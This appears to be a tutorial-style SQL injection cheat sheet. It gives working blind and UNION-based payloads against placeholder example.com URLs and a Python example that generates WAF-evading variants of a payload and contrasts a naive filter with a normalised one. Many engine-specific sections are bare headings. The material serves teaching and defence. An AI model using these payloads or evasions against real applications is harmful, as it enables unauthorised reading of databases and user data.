SQL Injection Cheat Sheet
A comprehensive guide to SQL Injection vulnerabilities, techniques, and examples. Learn how to exploit different databases and bypass WAF.
Medusa
6 Mins
What is SQL Injection?
SQL Injection is a vulnerability in the code an application uses to talk to its database. It occurs when an attacker can insert, or "inject", their own SQL into a query the application sends to the database, which can allow the attacker to read, modify, or delete data the application never meant to expose. The vulnerability usually arises when an application builds a query by concatenating user input into a SQL string instead of passing the input as a bound parameter, and does not properly validate that input before it reaches the query.
What is a SQL Injection Cheat Sheet?
A SQL Injection Cheat Sheet is a compiled set of techniques, payloads, and tips for finding and exploiting SQL Injection vulnerabilities. It is organised by database engine because the syntax for comments, string concatenation, time delays, and metadata queries differs between them. Penetration testers and attackers use it to understand how a vulnerable query can be exploited; defenders use it to recognise what an exploitation attempt looks like.
Detection: Characters that can break a query
Table of Contents
Oracle
PostgreSQL
Microsoft
MySQL
Oracle SQL Injection
Version:
Comment
List Users
List Current Database
List Columns
List Tables
String Concatenation
Time Delay
Conditional Time Delays
BEGIN
DNS Lookup
Microsoft SQL Injection
Version
Comment
List Users
List Current Database
List Column
List Table
String Concatenation
Time Delay
Conditional Time Delays
DNS Lookup
PostgreSQL Injection
Version
Comment
List Users
List Current Database
List Column
List Table
String Concatenation
Time Delay
Conditional Time Delays
DNS Lookup
MySQL Injection
Version
Comment
List Users
List Current Database
List Column
List Table
String Concatenation
Time Delay
Conditional Time Delays
DNS Lookup
Boolean Based Blind SQLi
Blind SQL Injection asks the database a series of true-or-false questions and infers each answer from how the application responds (a normal page versus a missing row, an error, or a delay) rather than from data echoed back, retrieving data one character or one bit at a time. It is used when the application does not display query results or error messages, but the injected condition still changes its behaviour.
Retrieving Database Name Length
The given query checks whether the current database name is exactly 17 characters long. Vary the number until the page responds as it does for the unmodified id=1 request; that number is the length.
http://example.com/index.php?id=1' AND (length(database())) = 17 --+
Retrieving Database Name
http://example.com/index.php?id=1' AND (ascii(substr((select database()),1,1))) > 105 --+
This compares the first character of the database name with ASCII 105 (i). If the page renders normally, the condition is true; if the row disappears or the page content changes, it is false. Narrow the value with a binary search over the ASCII range (about seven requests per character) rather than stepping through values one by one, then move to the next character by increasing the offset in substr().
Retrieving Table Length
' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 4 --+
Retrieving Table Name
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 108 --+
Retrieving Data Length
Once a table and column are known, the same approach recovers the data itself. This query tests whether the first username in the users table is 7 characters long:
' AND (length((select username from users limit 0,1))) = 7 --+
Retrieving Data
This query tests whether the first character of that username is greater than ASCII 101 (e); repeat the comparison for each position, exactly as with the table name above:
' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 101 --+
Union SQL Injection Attack
Union SQL Injection is a type of SQL Injection attack which uses the UNION SQL operator to combine the results of the original query with results from injected malicious SQL statements. This allows an attacker to extract information from the database. The attacker can use this technique to retrieve data from different database tables that would not normally be accessible through the application.
Identify Number of Columns - ORDER BY clause
http://example.com/index.php?id=1' order by 1-- -
Keep incrementing the number until the application returns an error (or an empty page): the last value that still worked is the number of columns in the original query, which the UNION SELECT below must match.
For example:
http://example.com/index.php?id=1' order by 2-- -
http://example.com/index.php?id=1' order by 3-- -
http://example.com/index.php?id=1' order by 4-- -
Identify column that stores “String”
http://example.com/index.php?id=1' Union Select 'a', null, null, null from dual-- -
If the response contains the string 'a', that column is reflected in the page and can carry injected data. If it doesn't, move the marker to the next position until the string is reflected. The from dual clause is required on Oracle and accepted by MySQL; omit it on Microsoft SQL Server and PostgreSQL, which do not have a dual table and do not need a FROM clause for a bare SELECT.
http://example.com/index.php?id=1' Union Select null, 'a', null, null from dual-- -
http://example.com/index.php?id=1' Union Select null, null, 'a', null from dual-- -
http://example.com/index.php?id=1' Union Select null, null, null, 'a' from dual-- -
Once you know which column is reflecting data, identify the database engine and its version by placing a version expression in that column. Here is the MySQL form; note that it is a plain expression, not a nested SELECT or a second statement:
http://example.com/index.php?id=1' Union Select '1', '2', '3', version() from dual-- -
The version expression differs by engine: version() on MySQL and PostgreSQL, @@version on Microsoft SQL Server, and (select banner from v$version where rownum=1) on Oracle. If one form errors, try the next; the string that comes back normally names the engine.
If you want to retrieve more information, simply modify the statements in the column.
Out of Band SQLi for different databases
Out of Band SQLi (SQL Injection) is a type of SQL Injection attack where the attacker is able to retrieve data via non-traditional channels, such as DNS or HTTP requests. This method is usually used when the server responses are not very verbose, making it hard to extract data. In essence, Out of Band SQLi takes advantage of the server's ability to make DNS or HTTP requests to deliver data to the attacker.
MySQL
DNS Exfiltration:
HTTP(S) Request Exfiltration:
Microsoft SQL Server
DNS Exfiltration:
HTTP(S) Request Exfiltration: Microsoft SQL Server has no built-in HTTP client, so HTTP(S) exfiltration is only possible where optional features such as xp_cmdshell or the OLE Automation procedures have been enabled, which is not the default. DNS is the usual out-of-band channel on this engine.
PostgreSQL
DNS Exfiltration: PostgreSQL has no built-in DNS or network function, so DNS exfiltration is only possible with superuser-level features, for example COPY ... FROM PROGRAM running a resolver command, or an extension such as dblink connecting to an attacker-controlled hostname.
Oracle
DNS Exfiltration:
HTTP(S) Request Exfiltration:
Bypass WAF
A Web Application Firewall (WAF) is a security measure designed to protect web applications by monitoring and filtering HTTP traffic between a web application and the Internet. It uses a set of rules to identify and block potentially harmful traffic, including SQL Injection attacks.
A WAF protects a web application by inspecting the parameters of incoming HTTP requests (query string, body, headers, cookies) for patterns that match known SQL Injection payloads and blocking matching requests before they reach the application. Because it is a pattern-based control, it only stops what its rules recognise; the actual fix is parameterised queries in the application, and a WAF should not be the sole defense against SQL Injection attacks.
Payloads that bypass a WAF rely on techniques such as inline comment injection, URL encoding, and keyword obfuscation. Each produces a request that the database still parses as the intended SQL but that no longer matches the WAF's signature as written.
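To make the point concrete, here is an added example (not from the original page) in Python: a single naive "UNION SELECT" signature applied to the raw parameter, the same signature applied after normalisation, and the three evasions named above applied to one payload. The rule and the function names (naive_waf_blocks, normalize, hardened_waf_blocks, obfuscate, compare) are constructed for this example and do not quote any real product's rule set.

```python
import re
from urllib.parse import unquote

# A naive signature of the kind a WAF rule might carry: the keyword pair
# "UNION SELECT" separated by whitespace. Constructed for this example; no
# real product's rule set is quoted.
UNION_SELECT = re.compile(r"\bunion\s+select\b", re.IGNORECASE)


def naive_waf_blocks(raw_param: str) -> bool:
    """Match the signature against the parameter exactly as it arrived."""
    return UNION_SELECT.search(raw_param) is not None


def normalize(raw_param: str) -> str:
    """Undo the attacker's transformations before matching any rule."""
    s = raw_param
    for _ in range(3):                    # peel nested percent-encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)  # /**/ is a separator to MySQL
    s = re.sub(r"\s+", " ", s)            # tabs and newlines (%09, %0a) act as spaces
    return s.lower()


def hardened_waf_blocks(raw_param: str) -> bool:
    """The same signature applied after normalisation."""
    return UNION_SELECT.search(normalize(raw_param)) is not None


def obfuscate(payload: str) -> dict:
    """Three common evasions applied to one payload; the database still
    parses each variant as the original statement."""
    return {
        "comment injection": payload.replace(" ", "/**/"),
        "url encoding": "".join(f"%{ord(c):02x}" for c in payload),
        "mixed case": "".join(c.upper() if i % 2 else c.lower()
                              for i, c in enumerate(payload)),
    }


def compare(payload: str) -> dict:
    """For each variant: (blocked by naive rule, blocked by hardened rule)."""
    return {name: (naive_waf_blocks(p), hardened_waf_blocks(p))
            for name, p in obfuscate(payload).items()}


if __name__ == "__main__":
    for name, verdict in compare("1' UNION SELECT null,null,null-- -").items():
        print(f"{name:18s} naive={verdict[0]} hardened={verdict[1]}")
```

Comment injection and percent-encoding slip past the raw-parameter rule while mixed case does not, because the rule was already case-insensitive; normalising first closes those two gaps. A real WAF decodes at least once, so the attacker's counter is double encoding (%2555NION), which only works when the WAF decodes fewer times than the application does. Even the hardened rule still misses forms it was never written for (UNION ALL SELECT, for one), which is why the page's advice stands: the WAF is a layer, and the parameterised query is the fix.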